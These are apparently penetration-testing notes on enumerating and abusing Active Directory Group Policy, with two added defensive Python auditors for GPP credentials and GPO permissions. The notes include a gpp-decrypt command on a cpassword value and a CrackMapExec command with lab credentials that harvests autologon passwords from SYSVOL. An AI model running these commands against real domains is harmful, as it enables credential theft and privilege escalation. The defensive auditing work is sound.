Group Policy Enumeration & Attacks

This section covers various techniques used to enumerate and exploit Group Policy Objects (GPOs) within a Windows domain environment.

1. Decrypt Group Policy Preference Password

Command:

gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE
  • Description: Decrypts a captured Group Policy Preference (GPP) cpassword value. GPP encrypted these passwords with a fixed AES key that Microsoft later published, which is why any cpassword still left in SYSVOL is recoverable by anyone who can read the share. Performed from a Linux-based host.


2. Locate Group Policy Preference Credentials

Command:

crackmapexec smb -L | grep gpp
  • Description: Lists the CrackMapExec SMB modules and filters the list with grep for the GPP-related ones (the modules that search SYSVOL for GPP passwords). Performed from a Linux-based host.

Command:

crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin
  • Description: Uses the CrackMapExec gpp_autologin module to search the SYSVOL share of the Windows target for autologon credentials stored in GPP Registry.xml files. Performed from a Linux-based host.
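The two sections above locate the same artifact from two directions: GPP XML files in SYSVOL that still carry a cpassword attribute (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml) or a cleartext autologon DefaultPassword in Registry.xml. The following auditor, an added example that is not part of these notes nor of gpp-decrypt or CrackMapExec, walks a local copy of SYSVOL and reports every such item without decrypting anything, which is what a defender wants for a cleanup pass. The SYSVOL layout, GUIDs, account names and password values in the sample tree are constructed.

```python
"""Report embedded credentials in Group Policy Preference XML files (added example)."""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files whose <Properties> element may carry a cpassword attribute.
CPASSWORD_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
                   "datasources.xml", "drives.xml"}
# Attribute names the different item types use for the account the password belongs to.
PRINCIPAL_ATTRS = ("userName", "accountName", "runAs", "username")


def _principal(attrib):
    for key in PRINCIPAL_ATTRS:
        if attrib.get(key):
            return attrib[key]
    return "<unknown>"


def _autologon_user(root):
    for props in root.iter("Properties"):
        if props.attrib.get("name", "").lower() == "defaultusername":
            return props.attrib.get("value") or "<unknown>"
    return "<unknown>"


def audit_gpp_tree(root_dir):
    """Return one finding dict per embedded credential found under root_dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for fname in files:
            lower = fname.lower()
            if not lower.endswith(".xml"):
                continue
            path = os.path.join(dirpath, fname)
            try:
                root = ET.parse(path).getroot()
            except ET.ParseError:
                continue  # corrupt or non-GPP XML: skip it rather than abort the audit
            rel = os.path.relpath(path, root_dir)
            if lower in CPASSWORD_FILES:
                for item in root.iter():
                    props = item.find("Properties")
                    # An empty cpassword means the item sets no password; only flag real values.
                    if props is not None and props.attrib.get("cpassword"):
                        findings.append({"file": rel, "kind": "cpassword", "item": item.tag,
                                         "principal": _principal(props.attrib)})
            elif lower == "registry.xml":
                for props in root.iter("Properties"):
                    if (props.attrib.get("name", "").lower() == "defaultpassword"
                            and props.attrib.get("value")):
                        findings.append({"file": rel, "kind": "autologon", "item": "Registry",
                                         "principal": _autologon_user(root)})
    return findings


# Constructed sample files mimicking the SYSVOL Policies layout; GUIDs and values are made up.
_GPO1 = "{11111111-0000-0000-0000-000000000001}"
_GPO2 = "{11111111-0000-0000-0000-000000000002}"
_WINLOGON = 'hive="HKEY_LOCAL_MACHINE" key="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"'
SAMPLE_FILES = {
    os.path.join(_GPO1, "Machine", "Preferences", "Groups", "Groups.xml"):
        '<?xml version="1.0" encoding="utf-8"?>\n<Groups>\n'
        '  <User name="svc_backup" changed="2024-01-01 00:00:00">\n'
        '    <Properties action="U" cpassword="CONSTRUCTED_CPASSWORD_VALUE" '
        'userName="svc_backup" neverExpires="1"/>\n  </User>\n</Groups>\n',
    os.path.join(_GPO1, "Machine", "Preferences", "Registry", "Registry.xml"):
        '<?xml version="1.0" encoding="utf-8"?>\n<RegistrySettings>\n'
        f'  <Registry name="DefaultUserName"><Properties action="U" {_WINLOGON} '
        'name="DefaultUserName" type="REG_SZ" value="kiosk"/></Registry>\n'
        f'  <Registry name="DefaultPassword"><Properties action="U" {_WINLOGON} '
        'name="DefaultPassword" type="REG_SZ" value="CONSTRUCTED_CLEARTEXT"/></Registry>\n'
        '</RegistrySettings>\n',
    # A GPO that only renames the local Administrator: cpassword is empty, so no finding.
    os.path.join(_GPO2, "Machine", "Preferences", "Groups", "Groups.xml"):
        '<?xml version="1.0" encoding="utf-8"?>\n<Groups>\n'
        '  <User name="Administrator (built-in)">\n'
        '    <Properties action="U" newName="lcladm" cpassword="" userName="Administrator"/>\n'
        '  </User>\n</Groups>\n',
}


def build_sample_sysvol(base):
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def run_demo():
    """Write the constructed tree to a temp dir, audit it, and return the findings."""
    base = tempfile.mkdtemp(prefix="sysvol_")
    build_sample_sysvol(base)
    return audit_gpp_tree(base)


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f['kind']}] {f['file']} -> {f['item']} for {f['principal']}")
```

Point audit_gpp_tree at a mounted or copied SYSVOL\<domain>\Policies directory to run it against real data; every hit should be removed from the GPO and the affected account's password rotated, since the encrypted value is no protection.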


3. Enumerate Group Policy Objects (GPOs)

Command:

Get-DomainGPO | select displayname
  • Description: PowerView function that enumerates the GPOs in the target Windows domain, reduced to their display names. Performed from a Windows-based host.

Command:

Get-GPO -All | Select DisplayName
  • Description: GroupPolicy module cmdlet that lists the display names of all GPOs in the domain. Performed from a Windows-based host.


4. Check Permissions on GPOs

Command:

$sid=Convert-NameToSid "Domain Users"
  • Description: PowerView function that resolves the "Domain Users" group to its SID and stores it in the variable $sid for use in the next command. Performed from a Windows-based host.

Command:

Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq $sid}
  • Description: PowerView pipeline that retrieves the ACL of every GPO and filters (? is the Where-Object alias) for ACEs whose SID matches $sid, showing whether "Domain Users" hold any rights over GPOs. Write rights held by such a broad group are a misconfiguration worth fixing. Performed from a Windows-based host.
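The ACL check above only answers "does Domain Users appear at all"; what matters is which rights a broad principal holds. The triage below is an added example, not part of these notes or of PowerView: it takes ACE records with the field names PowerView's Get-ObjectAcl emits (ObjectDN, SecurityIdentifier, ActiveDirectoryRights, AceType, ObjectAceType; assumed here and constructed inline rather than exported from a domain), ignores read-only and deny entries, and flags write-capable rights held by Everyone, Authenticated Users, BUILTIN\Users, Domain Users or Domain Computers. The policy GUID it pulls from each DN is the value the Get-GPO -Guid command in the next section takes. The domain SID and GPO GUIDs are made up.

```python
"""Triage GPO ACL records for write rights held by broad principals (added example)."""
import re

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed

# Principals that effectively mean "every user or computer in the domain".
WELL_KNOWN_BROAD = {"S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users",
                    "S-1-5-32-545": "BUILTIN\\Users"}
BROAD_RIDS = {"513": "Domain Users", "515": "Domain Computers"}

# Rights that let the holder modify the GPO object, its ACL or its owner.
HIGH_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
# WriteProperty over all attributes is as serious; one scoped to a single attribute needs review.
UNSCOPED = {"", "All", "00000000-0000-0000-0000-000000000000"}


def broad_principal(sid):
    """Return a display name if the SID is a broad group, else None."""
    if sid in WELL_KNOWN_BROAD:
        return WELL_KNOWN_BROAD[sid]
    if sid.startswith("S-1-5-21-"):
        return BROAD_RIDS.get(sid.rsplit("-", 1)[-1])
    return None


def gpo_guid_from_dn(dn):
    """Extract the policy GUID from CN={GUID},CN=Policies,... for use with Get-GPO -Guid."""
    m = re.match(r"CN=\{([0-9A-Fa-f-]{36})\},CN=Policies,", dn)
    return m.group(1) if m else None


def triage_gpo_aces(aces):
    findings = []
    for ace in aces:
        if ace.get("AceType", "AccessAllowed") != "AccessAllowed":
            continue  # deny ACEs grant nothing
        who = broad_principal(ace["SecurityIdentifier"])
        if who is None:
            continue  # a specific admin group holding rights is expected, not a finding
        rights = {r.strip() for r in ace["ActiveDirectoryRights"].split(",")}
        if rights & HIGH_RIGHTS:
            severity = "high"
        elif "WriteProperty" in rights and ace.get("ObjectAceType", "All") in UNSCOPED:
            severity = "medium"
        else:
            continue  # read rights are normal: clients must read a GPO to apply it
        findings.append({"gpo_guid": gpo_guid_from_dn(ace["ObjectDN"]), "principal": who,
                         "rights": sorted(rights & (HIGH_RIGHTS | {"WriteProperty"})),
                         "severity": severity})
    return findings


def _dn(guid):
    return f"CN={{{guid}}},CN=Policies,CN=System,DC=example,DC=local"


SAMPLE_ACES = [  # constructed records in Get-ObjectAcl's field layout
    {"ObjectDN": _dn("AAAAAAAA-1111-2222-3333-444444444444"), "SecurityIdentifier": DOMAIN_SID + "-513",
     "ActiveDirectoryRights": "ReadProperty, GenericExecute", "AceType": "AccessAllowed",
     "ObjectAceType": "All"},  # normal: Domain Users can read the GPO
    {"ObjectDN": _dn("BBBBBBBB-1111-2222-3333-444444444444"), "SecurityIdentifier": DOMAIN_SID + "-513",
     "ActiveDirectoryRights": "CreateChild, DeleteChild, ReadProperty, WriteProperty, GenericExecute",
     "AceType": "AccessAllowed", "ObjectAceType": "All"},  # Domain Users can write every attribute
    {"ObjectDN": _dn("CCCCCCCC-1111-2222-3333-444444444444"), "SecurityIdentifier": "S-1-5-11",
     "ActiveDirectoryRights": "WriteDacl", "AceType": "AccessAllowed",
     "ObjectAceType": "All"},  # Authenticated Users can rewrite the ACL
    {"ObjectDN": _dn("CCCCCCCC-1111-2222-3333-444444444444"), "SecurityIdentifier": DOMAIN_SID + "-512",
     "ActiveDirectoryRights": "GenericAll", "AceType": "AccessAllowed",
     "ObjectAceType": "All"},  # Domain Admins: expected
    {"ObjectDN": _dn("AAAAAAAA-1111-2222-3333-444444444444"), "SecurityIdentifier": "S-1-1-0",
     "ActiveDirectoryRights": "GenericAll", "AceType": "AccessDenied",
     "ObjectAceType": "All"},  # deny entry: grants nothing
]


def run_demo():
    return triage_gpo_aces(SAMPLE_ACES)


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f['severity']}] GPO {f['gpo_guid']}: {f['principal']} has {', '.join(f['rights'])}")
```

To use it on real output, export Get-DomainGPO | Get-ObjectAcl to JSON or CSV and load the records into triage_gpo_aces; each finding's gpo_guid identifies the policy to inspect and re-permission.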


5. Retrieve GPO Details Using GUID

Command:

Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532
  • Description: GroupPolicy module cmdlet that retrieves detailed information about a single GPO by its GUID, the value that appears in the GPO's distinguished name and in its SYSVOL folder name. Performed from a Windows-based host.
